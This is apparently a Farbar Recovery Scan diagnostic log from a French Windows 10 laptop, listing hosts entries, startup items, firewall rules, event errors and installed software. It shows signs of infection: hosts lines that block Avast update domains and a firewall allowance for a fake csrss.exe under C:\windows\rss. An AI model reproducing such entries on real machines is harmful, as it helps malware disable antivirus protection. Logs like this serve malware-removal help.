2015-03-17 00:34 - 2015-03-17 00:34 - 000010240 _____ () C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\locale\fr_fr\acrotray.fra
==================== Alternate Data Streams (Whitelisted) =========
(If an entry is included in the fixlist, only the ADS will be removed.)
==================== Safe Mode (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
==================== Association (Whitelisted) ===============
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
==================== Internet Explorer trusted/restricted ===============
(If an entry is included in the fixlist, it will be removed from the registry.)
==================== Hosts content: ==========================
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
2015-10-30 07:24 - 2017-09-14 21:02 - 000013941 _____ C:\windows\system32\Drivers\etc\hosts
127.0.0.1 cpm.paneladmin.pro
127.0.0.1 publisher.hmdiadmingate.xyz
127.0.0.1 distribution.hmdiadmingate.xyz
127.0.0.1 hmdicrewtracksystem.xyz
127.0.0.1 linkmate.space
127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 doctorlink.space
127.0.0.1 plugpackdownload.net
127.0.0.1 texttotalk.org
127.0.0.1 gambling577.xyz
127.0.0.1 htagdownload.space
127.0.0.1 mybcnmonetize.com
127.0.0.1 360devtraking.website
127.0.0.1 dscdn.pw
127.0.0.1 beautifllink.xyz
127.0.0.1 gf.tools.avast.com
127.0.0.1 pair.ff.avast.com
127.0.0.1 ipm-provider.ff.avast.com
127.0.0.1 ipm-provider.ff.avast.com
127.0.0.1 ipm-provider.ff.avast.com
127.0.0.1 id.avast.com
127.0.0.1 v4618535.iavs9x.u.avast.com
127.0.0.1 v4618535.ivps9x.u.avast.com
127.0.0.1 v4618535.ivps9tiny.u.avast.com
127.0.0.1 v4618535.vpsnitro.u.avast.com
127.0.0.1 v4618535.vpsnitrotiny.u.avast.com
127.0.0.1 v4618535.iavs5x.u.avast.com
127.0.0.1 v7.stats.avast.com
127.0.0.1 v7.stats.avast.com
There are 348 more lines.
==================== Other Areas ============================
(Currently there is no automatic fix for this section.)
HKU\S-1-5-21-2924308242-708578159-770495721-1002\Control Panel\Desktop\\Wallpaper -> C:\windows\web\wallpaper\Hewlett-Packard Backgrounds\backgroundDefault.jpg
DNS Servers: Media is not connected to internet.
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.
==================== MSCONFIG/TASK MANAGER disabled items ==
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "ZSZTCNJ2OMKV55I"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "35UF2TJYS7GUZCF"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "X9MR35AQD7KQ5KM"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "H8S7UD3RNIBVABD"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "TREB6DLEK9Y2AU6"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "SKLLNIIF73187T7"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "41TMXCH4BKVE27Q"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "msiql"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "0O8K7L6I4PLKLKA"
HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\StartupApproved\Run: => "2CB4OUAQHFKB0TG"
==================== FirewallRules (Whitelisted) ===============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
FirewallRules: [{06264B65-F981-4F5C-8FC0-383E9BE4F57D}] => (Allow) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPSOCKSVC.exe
FirewallRules: [{C5004A9E-30D4-4BE9-8EE3-A78223ECDCF8}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{6E01A0D3-06E8-4F3E-B3A2-A5C7E5563C4B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{95D0A191-57C4-4D9B-819E-70C476BDA449}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{3A1C70EC-D8A7-4A8A-B8E4-EFBF49D24833}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{BB27264A-ED10-46E7-A76C-BABF13ED321F}] => (Allow) c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE
FirewallRules: [{3EEC113D-2136-4D90-8939-8CD273B825B1}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD.exe
FirewallRules: [{AF3D5CF7-E5D0-477D-BDA2-35EA55CC1369}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Kernel\DMS\CLMSServerPDVD14.exe
FirewallRules: [{A9345FFE-2D51-49CE-A79D-76BFD7B61C74}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe
FirewallRules: [{A4088A32-DC7F-4324-A8FF-C2E57379232B}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVDMovie.exe
FirewallRules: [{C492F773-8EEE-45F0-9164-A8F3898BF7AF}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVD Cinema\PowerDVDCinema.exe
FirewallRules: [{35F53E17-E1CD-4F91-8F98-963F1BE66F4A}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{C24AE935-954A-4E58-B25F-776F3B5042D1}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{6DE5D107-86BC-4DCA-9293-E27FB89C81DD}] => (Allow) C:\Program Files\Mozilla Firefox\firefox.exe
FirewallRules: [{363BF103-F490-43A2-A799-64A51BFE0C32}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{719E644A-35BC-41DB-A7A2-90AC9EB9EFC4}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{32EA4C83-28E9-4379-8A75-DE889303E930}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{33F4DDED-84DA-428C-8ED5-35B64A8C6F1F}] => (Allow) C:\windows\system32\rundll32.exe
FirewallRules: [{A075DD94-B943-41C2-994A-27BB5312A3A5}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office16\lync.exe
FirewallRules: [{EF6020DC-EA23-4BE3-88B4-2DB0DFE16028}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office16\lync.exe
FirewallRules: [{F98083A0-45CD-4A75-894D-7350B7B28EEC}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
FirewallRules: [{AE9F890A-8451-43A5-982B-3C87F92CD1F5}] => (Allow) C:\Program Files (x86)\Microsoft Office\Office16\UcMapi.exe
FirewallRules: [{67E81FF5-CC85-474E-A85F-02ABA3F15074}] => (Allow) C:\windows\rss\csrss.exe
FirewallRules: [{D8482D6E-30DC-41C4-9099-A2E6F7E2FE8C}] => (Allow) C:\Users\hp\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe
FirewallRules: [{3A2BD150-85F0-4CDC-B44D-EE5466DDF595}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{694857C4-E544-4654-8A19-33E879DDA294}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{50531857-024B-4F49-8F9B-8EFF8AC84DC8}] => (Allow) C:\Users\hp.LAPTOP-RUV870D4\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{B2416515-41F5-4AD0-B6BC-53B995D2876E}] => (Allow) C:\Users\hp.LAPTOP-RUV870D4\AppData\Roaming\uTorrent\uTorrent.exe
FirewallRules: [{D8292B6D-282B-433C-A8B7-7106B8E747AA}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\21\WinWrapIDE.exe
FirewallRules: [{71CBB400-560D-41D9-94C7-E9CA6CAA5C88}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\21\stats.com
FirewallRules: [{4F9DB7F4-D4A5-4DF3-804D-ACF6109E7A50}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\21\stats.exe
FirewallRules: [{B722624C-6D84-4CD6-89AC-A924F92E97D6}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\21\WinWrapIDE.exe
FirewallRules: [{A362540A-61EB-4605-B97B-F9EA1DA07E50}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\21\stats.com
FirewallRules: [{0B90A5D0-0E5A-4370-84AD-890B3203ED1F}] => (Allow) C:\Program Files\IBM\SPSS\Statistics\21\stats.exe
FirewallRules: [TCP Query User{265E2C51-BAA7-480E-BB25-11392E176DA7}C:\program files\ibm\spss\statistics\21\jre\bin\javaw.exe] => (Allow) C:\program files\ibm\spss\statistics\21\jre\bin\javaw.exe
FirewallRules: [UDP Query User{18C572C8-069C-4985-AB0F-78227D1B2091}C:\program files\ibm\spss\statistics\21\jre\bin\javaw.exe] => (Allow) C:\program files\ibm\spss\statistics\21\jre\bin\javaw.exe
FirewallRules: [{604268B5-F0E1-4F5B-A7EF-02B33E6633F3}] => (Allow) C:\Windows\System32\rundll32.exe
FirewallRules: [{32352ADE-B07C-4804-BEE7-43E71117924B}] => (Allow) C:\Windows\System32\rundll32.exe
==================== Restore Points =========================
25-09-2017 15:20:04 Windows Update
30-09-2017 06:59:58 Installed IBM SPSS Statistics 21 Developer.
09-10-2017 12:16:48 Windows Update
==================== Faulty Device Manager Devices =============
==================== Event log errors: =========================
Application errors:
==================
Error: (10/10/2017 10:20:57 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: LAPTOP-RUV870D4)
Description: Échec de l’activation de l’application Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge avec l’erreur : -2144927142 Pour plus d’informations, voir le journal Microsoft-Windows-TWinUI/Opérationnel.
Error: (10/10/2017 10:17:47 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: LAPTOP-RUV870D4)
Description: Le package Microsoft.MicrosoftEdge_25.10586.672.0_neutral__8wekyb3d8bbwe+MicrosoftEdge#{ccd03aa8-f336-408a-9f6c-e81dee0a4486} a été interrompu, car sa suspension a été trop longue.
Error: (10/10/2017 10:17:45 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: LAPTOP-RUV870D4)
Description: Le package Microsoft.MicrosoftEdge_25.10586.672.0_neutral__8wekyb3d8bbwe+MicrosoftEdge#{ddcbed84-872b-4073-944e-a23a5ba75e89} a été interrompu, car sa suspension a été trop longue.
Error: (10/10/2017 10:17:44 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: LAPTOP-RUV870D4)
Description: Le package Microsoft.MicrosoftEdge_25.10586.672.0_neutral__8wekyb3d8bbwe+MicrosoftEdge#{173eba07-8b59-4d92-be75-05e703c71534} a été interrompu, car sa suspension a été trop longue.
Error: (10/10/2017 10:16:43 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 2484) (User: LAPTOP-RUV870D4)
Description: Le package Microsoft.MicrosoftEdge_25.10586.672.0_neutral__8wekyb3d8bbwe+MicrosoftEdge a été interrompu, car sa suspension a été trop longue.
Error: (10/10/2017 09:53:47 AM) (Source: MsiInstaller) (EventID: 10005) (User: NT AUTHORITY)
Description: Product: KB4023057 -- A later version of KB4023057 is already installed. Setup will now exit.
Error: (10/09/2017 07:04:30 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 6547
Error: (10/09/2017 07:04:30 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledEvent 6547
Error: (10/09/2017 07:04:30 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: Continuously busy for more than a second
Error: (10/09/2017 07:04:29 PM) (Source: Bonjour Service) (EventID: 100) (User: )
Description: Task Scheduling Error: m->NextScheduledSPRetry 5469
System errors:
=============
Error: (10/10/2017 10:27:20 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service Device Install Service n’a pas pu démarrer en raison de l’erreur :
Le client d’un composant a demandé une opération qui n’est pas valide compte tenu de l’état de l’instance du composant.
Error: (10/10/2017 09:50:09 AM) (Source: Microsoft-Windows-DNS-Client) (EventID: 1012) (User: NT AUTHORITY)
Description: Une erreur s’est produite lors de la lecture du fichier d’hôtes local.
Error: (10/10/2017 09:48:23 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Le service 7fa873b86c1118b0b18259f1000e475e n’a pas pu démarrer en raison de l’erreur :
Le service n’a pas répondu assez vite à la demande de lancement ou de contrôle.
Error: (10/10/2017 09:48:23 AM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Le dépassement de délai (60000 millisecondes) a été atteint lors de l’attente de la connexion du service 7fa873b86c1118b0b18259f1000e475e.
Error: (10/10/2017 09:46:20 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Le service Sync Host_bc22cb s’est terminé de manière inattendue. Ceci s’est produit 1 fois. L’action corrective suivante va être effectuée dans 10000 millisecondes : Restart the service.
Error: (10/10/2017 09:42:54 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: NT AUTHORITY)
Description: Le service de configuration automatique de réseau WLAN a détecté une connectivité limitée en exécutant Reset/Recover.adapter.
Code : 8 0x0 0x0
Error: (10/10/2017 09:42:50 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: NT AUTHORITY)
Description: Le service de configuration automatique de réseau WLAN a détecté une connectivité limitée en exécutant Reset/Recover.adapter.
Code : 2 0xdeaddeed 0xeeec
Error: (10/10/2017 09:42:50 AM) (Source: Microsoft-Windows-WLAN-AutoConfig) (EventID: 4003) (User: NT AUTHORITY)
Description: Le service de configuration automatique de réseau WLAN a détecté une connectivité limitée en exécutant Reset/Recover.adapter.
Code : 1 0xc 0x4
Error: (10/10/2017 09:42:11 AM) (Source: DCOM) (EventID: 10016) (User: LAPTOP-RUV870D4)
Description: Les paramètres d’autorisation application-specific n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID
{9E175B6D-F52A-11D8-B9A5-505054503030}
et l’APPID
{9E175B9C-F52A-11D8-B9A5-505054503030}
au SID LAPTOP-RUV870D4\hp de l’utilisateur (S-1-5-21-2924308242-708578159-770495721-1002) depuis l’adresse LocalHost (Using LRPC) s’exécutant dans le SID Microsoft.MicrosoftEdge_25.10586.672.0_neutral__8wekyb3d8bbwe du conteneur d’applications (S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants.
Error: (10/10/2017 09:42:09 AM) (Source: DCOM) (EventID: 10016) (User: LAPTOP-RUV870D4)
Description: Les paramètres d’autorisation application-specific n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID
{9E175B6D-F52A-11D8-B9A5-505054503030}
et l’APPID
{9E175B9C-F52A-11D8-B9A5-505054503030}
au SID LAPTOP-RUV870D4\hp de l’utilisateur (S-1-5-21-2924308242-708578159-770495721-1002) depuis l’adresse LocalHost (Using LRPC) s’exécutant dans le SID Microsoft.MicrosoftEdge_25.10586.672.0_neutral__8wekyb3d8bbwe du conteneur d’applications (S-1-15-2-3624051433-2125758914-1423191267-1740899205-1073925389-3782572162-737981194-4256926629-1688279915-2739229046-3928706915). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants.
CodeIntegrity:
===================================
Date: 2017-10-09 18:06:56.750
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-10-09 17:57:11.341
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-10-03 08:21:08.688
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-10-03 08:14:08.895
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-09-30 07:30:08.496
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-09-30 07:22:09.657
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-09-30 07:12:53.359
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-09-26 17:57:14.429
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-09-25 18:25:51.839
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
Date: 2017-09-25 18:15:04.462
Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
==================== Memory info ===========================
Processor: Intel(R) Core(TM) i3-5005U CPU @ 2.00GHz
Percentage of memory in use: 43%
Total physical RAM: 4011.39 MB
Available physical RAM: 2268.38 MB
Total Virtual: 7406.89 MB
Available Virtual: 5191.22 MB
==================== Drives ================================
Drive c: (WINDOWS) (Fixed) (Total:465.61 GB) (Free:370.49 GB) NTFS
Drive d: (RECOVERY) (Fixed) (Total:19.43 GB) (Free:2.27 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive f: (DISQUE A) (Fixed) (Total:250.2 GB) (Free:250.08 GB) NTFS
Drive g: (Nouveau nom) (Fixed) (Total:195.31 GB) (Free:54.46 GB) NTFS
Drive h: (AUBIN) (Removable) (Total:14.44 GB) (Free:6.79 GB) FAT32
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 42759ECA)
Partition: GPT.
========================================================
Disk: 1 (Size: 14.5 GB) (Disk ID: 2F004373)
Partition 1: (Not Active) - (Size=14.5 GB) - (Type=0C)
==================== End of Addition.txt ============================
Ran by hp (10-10-2017 10:44:24)
Running from C:\Users\hp.LAPTOP-RUV870D4\Desktop
Windows 10 Home Version 1511 170904-1742 (X64) (2017-03-15 15:39:06)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-2924308242-708578159-770495721-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2924308242-708578159-770495721-503 - Limited - Disabled)
Guest (S-1-5-21-2924308242-708578159-770495721-501 - Limited - Disabled)
hp (S-1-5-21-2924308242-708578159-770495721-1002 - Administrator - Enabled) => C:\Users\hp.LAPTOP-RUV870D4
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
µTorrent (HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\uTorrent) (Version: 3.5.0.43916 - BitTorrent Inc.)
Adobe Acrobat DC (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-0C0F074E4100}) (Version: 17.012.20098 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 26.0.0.127 - Adobe Systems Incorporated)
Adobe Flash Player 27 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 27.0.0.130 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.03) - Français (HKLM-x32\...\{AC76BA86-7AD7-1036-7B44-AB0000000001}) (Version: 11.0.03 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.9.199 - Adobe Systems, Inc.)
ArcGIS Desktop 10.5 (HKLM-x32\...\{76B58799-3448-4DE4-BA71-0FDFAA2A2E9A}) (Version: 10.5.6491 - Environmental Systems Research Institute, Inc.) Hidden
ArcGIS Desktop 10.5 (HKLM-x32\...\ArcGIS Desktop 10.5) (Version: 10.5.6491 - Environmental Systems Research Institute, Inc.)
ArcGIS License Manager 10.5 (HKLM-x32\...\{3A024FEA-3E14-4257-87D0-8FCA03257560}) (Version: 10.5.6491 - Environmental Systems Research Institute, Inc.) Hidden
ArcGIS License Manager 10.5 (HKLM-x32\...\ArcGIS License Manager 10.5) (Version: 10.5.6491 - Environmental Systems Research Institute, Inc.)
Assistant Mise à jour de Windows 10 (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22243 - Microsoft Corporation)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)
CSPro 6.1 (HKLM-x32\...\{D833663E-6DEE-4F0E-8060-4B3B1F0CA55F}) (Version: 6.1.0 - U.S. Census Bureau)
CyberLink PhotoDirector (HKLM\...\{5A454EC5-217A-42a5-8CE1-2DDEC4E70E01}) (Version: 5.0.6.7006 - CyberLink Corp.) Hidden
CyberLink PhotoDirector (HKLM-x32\...\InstallShield_{5A454EC5-217A-42a5-8CE1-2DDEC4E70E01}) (Version: 5.0.6.7006 - CyberLink Corp.)
CyberLink Power Media Player 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.2.5829 - CyberLink Corp.)
CyberLink PowerDirector 12 (HKLM\...\{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.5.4601 - CyberLink Corp.) Hidden
CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.5.4601 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\{A9CEDD6E-4792-493e-BB35-D86D2E188A5A}) (Version: 6.0.2.4627 - CyberLink Corp.)
DisableMSDefender (HKLM\...\{74FE39A0-FB76-47CD-84BA-91E2BBB17EF2}) (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Dropbox 25 GB (HKLM-x32\...\{0867A88D-764F-366E-9E21-130DA8B472C3}) (Version: 3.1.18.0 - Dropbox, Inc.)
Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.59.1 - Dropbox, Inc.) Hidden
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Ethnos 5.5 Web (HKLM-x32\...\{9ACF6CC6-571C-4E50-8E77-8DEFD567289F}) (Version: 5.5 - Soft Concept) Hidden
Ethnos 5.5 Web (HKLM-x32\...\InstallShield_{9ACF6CC6-571C-4E50-8E77-8DEFD567289F}) (Version: 5.5 - Soft Concept)
Evernote v. 5.8.13 (HKLM-x32\...\{A229420E-204B-11E5-B844-0050569584E9}) (Version: 5.8.13.8152 - Evernote Corp.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 46.0.2490.80 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.28.15 - Google Inc.) Hidden
Herramientas de corrección de Microsoft Office 2016: español (HKLM-x32\...\{90160000-001F-0C0A-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
HP Documentation (HKLM\...\HP_Documentation) (Version: - HP)
HP ePrint SW (HKLM-x32\...\{88970959-baf7-4864-a39a-69a58e8ae5cf}) (Version: 5.0.18701 - HP)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.8305.5282 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{61EB474B-67A6-47F4-B1B7-386851BAB3D0}) (Version: 8.0.29.6 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{D7D5F438-26EF-45AB-AB89-C476FBCF8584}) (Version: 12.0.26.62 - Hewlett-Packard Company)
HP System Event Utility (HKLM-x32\...\{D17A3B70-B75E-4C49-83D6-C17DDF65B35F}) (Version: 1.3.4 - Hewlett-Packard Company)
HP Welcome (HKLM\...\HPWelcome) (Version: 1.0 - HP Inc.)
HP Wireless Button Driver (HKLM-x32\...\{DD21DBC9-2A74-44DA-A543-B1F4AF3ABFCA}) (Version: 1.1.8.1 - HP)
IBM SPSS Statistics 21 (HKLM\...\{1E26B9C2-ED08-4EEA-83C8-A786502B41E5}) (Version: 21.0.0.0 - IBM Corp)
Intel(R) Chipset Device Software (HKLM-x32\...\{a47edec4-fa11-4d02-b329-4424d0197af8}) (Version: 10.1.1.7 - Intel(R) Corporation) Hidden
Intel(R) Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.1.10603.192 - Intel Corporation)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1156 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4549 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.2.1088 - Intel Corporation)
KB4023057 (HKLM\...\{0C050BEE-16BE-4998-8959-2A421433DB6E}) (Version: 2.5.0.0 - Microsoft Corporation)
Micro Foundation 7 version 7.0 (HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\{D447DBF5-6383-4F6E-884E-411D1B3C321E}}_is1) (Version: 7.0 - Micro Foundation 7, Inc.)
Microsoft Office Professionnel Plus 2016 (HKLM-x32\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\OneDriveSetup.exe) (Version: 17.3.6998.0830 - Microsoft Corporation)
Microsoft Project Professionnel 2013 (HKLM\...\Office15.PRJPRO) (Version: 15.0.4420.1017 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Mozilla Firefox 45.0 (x64 fr) (HKLM\...\Mozilla Firefox 45.0 (x64 fr)) (Version: 45.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.0 - Mozilla)
